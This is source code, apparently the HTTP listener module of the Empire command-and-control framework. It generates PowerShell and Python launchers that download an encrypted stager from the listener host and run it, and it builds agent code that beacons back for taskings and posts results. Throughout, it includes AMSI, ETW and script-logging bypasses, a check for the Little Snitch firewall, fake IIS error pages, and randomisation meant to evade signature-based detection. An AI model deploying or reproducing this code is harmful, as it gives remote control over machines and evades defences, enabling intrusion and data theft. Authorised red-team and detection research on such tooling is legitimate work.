'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'SlackURL': {
'Description': 'Your Slack Incoming Webhook URL to communicate with your Slack instance.',
'Required': False,
'Value': ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
self.session_cookie = ''
# if no session cookie has been set yet, generate a random cookie name
if self.session_cookie == '':
self.options['Cookie']['Value'] = self.generate_cookie()
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def method_not_allowed_page(self):
"""
Imitates IIS 7.5 405 "method not allowed" page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>405 - HTTP verb used to access this page is not allowed.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>405 - HTTP verb used to access this page is not allowed.</h2>',
' <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>\r\n'
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False, ETWBypass=False):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
cookie = listenerOptions['Cookie']['Value']
# generate a new cookie if the current one is empty, so creating multiple listeners never leaves an empty cookie
if cookie == '':
generate = self.generate_cookie()
listenerOptions['Cookie']['Value'] = generate
cookie = generate
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
stager += bypasses.scriptBlockLogBypass()
if ETWBypass:
stager += bypasses.ETWBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
stager += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
stager += bypasses.AMSIBypass2()
if safeChecks.lower() == 'true':
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + "=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='" + userAgent + "';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + '.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "','" + domain + "');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "');"
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = $netcred;")
# save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $" + helpers.generate_random_script_var_name("wc") + ".Proxy;"
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization(
"try{$ig=$" + helpers.generate_random_script_var_name(
"wc") + ".DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket.decode('UTF-8'))
stager += helpers.randomize_capitalization(
"$data=$" + helpers.generate_random_script_var_name("wc") + ".DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out.decode('UTF-8')):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print(helpers.color(p, color='red'))
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib.request;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket).decode('UTF-8')
launcherBase += "req=urllib.request.Request(server+t);\n"
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib.request.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib.request.ProxyHandler({'" + proto + "':'" + proxy + "'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib.request.build_opener(proxy);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n"
launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "o = urllib.request.build_opener();\n"
# install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib.request.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib.request.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s'.encode('UTF-8');" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=list(range(256)),0,[]\n"
launcherBase += "for i in list(range(256)):\n"
launcherBase += " j=(j+S[i]+key[i%len(key)])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(char^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase.encode('UTF-8')).decode('UTF-8')
if isinstance(launchEncoded, bytes):
launchEncoded = launchEncoded.decode('UTF-8')
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python3 &" % (
launchEncoded)
return launcher
else:
return launcherBase
else:
print(helpers.color(
"[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
stager = helpers.keyword_obfuscation(stager)
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
remove = []
if customHeaders != []:
for key in customHeaders:
value = key.split(":")
if 'cookie' in value[0].lower() and value[1]:
continue
remove += value
headers = ','.join(remove)
# headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
# Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
# forces inputs into a bytestring to ensure 2/3 compatibility
stagingKey = stagingKey.encode('UTF-8')
#stager = stager.encode('UTF-8')
#randomizedStager = randomizedStager.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
# There don't seem to be any code paths where the encrypt flag isn't set, so the
# other if/else branches below are effectively unused
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profile,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
stager = obfuscation.py_minify(stager)
# base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey.encode('UTF-8'), stager.encode('UTF-8'))
else:
# otherwise return the standard stager
return stager
else:
print(helpers.color(
"[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
code = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
code = helpers.keyword_obfuscation(code)
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + b64DefaultResponse.decode('UTF-8') + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "/data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace(
'profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")',
'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse.decode("UTF-8")))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (workingHours))
return code
else:
print(helpers.color(
"[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add("Cookie",\"""" + self.session_cookie + """session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $""" + helpers.generate_random_script_var_name("wc") + """.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $""" + helpers.generate_random_script_var_name("wc") + """.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets.decode('latin-1'))
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff into a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket).decode('UTF-8')
headers['Cookie'] = \"""" + self.session_cookie + """session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib.request.urlopen(urllib.request.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib.request.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib.request.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print(helpers.color(
"[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color('[!] listeners/http generate_comms(): no language specified!'))
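# Illustrative sketch (not part of Empire's listener API): taskings are requested by
# GET with the routing packet base64-encoded into the session cookie, as the comms
# code emitted above shows. 'packet' is an opaque placeholder for the bytes produced
# by packets.build_routing_packet(); this helper is not called anywhere in this module.
def _cookie_header_sketch(self, packet):
    b64 = base64.b64encode(packet).decode('UTF-8')
    return {'Cookie': '%ssession=%s' % (self.session_cookie, b64)}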
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
# Set HTTP/1.1 as in IIS 7.5 instead of /1.0
WSGIRequestHandler.protocol_version = "HTTP/1.1"
@app.route('/download/<stager>')
def send_stager(stager):
if 'po' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
elif 'py' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
else:
return make_response(self.default_response(), 404)
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.errorhandler(405)
def handle_405(e):
"""
Returns IIS 7.5 405 page for every Flask 405 error.
"""
return make_response(self.method_not_allowed_page(), 405)
@app.route('/')
@app.route('/iisstart.htm')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
if request_uri.lower() == 'welcome.png':
# Serves image loaded by index page.
#
# Case-insensitive matching makes this behave the same way as an actual IIS server.
static_dir = self.mainMenu.installPath + "data/misc/"
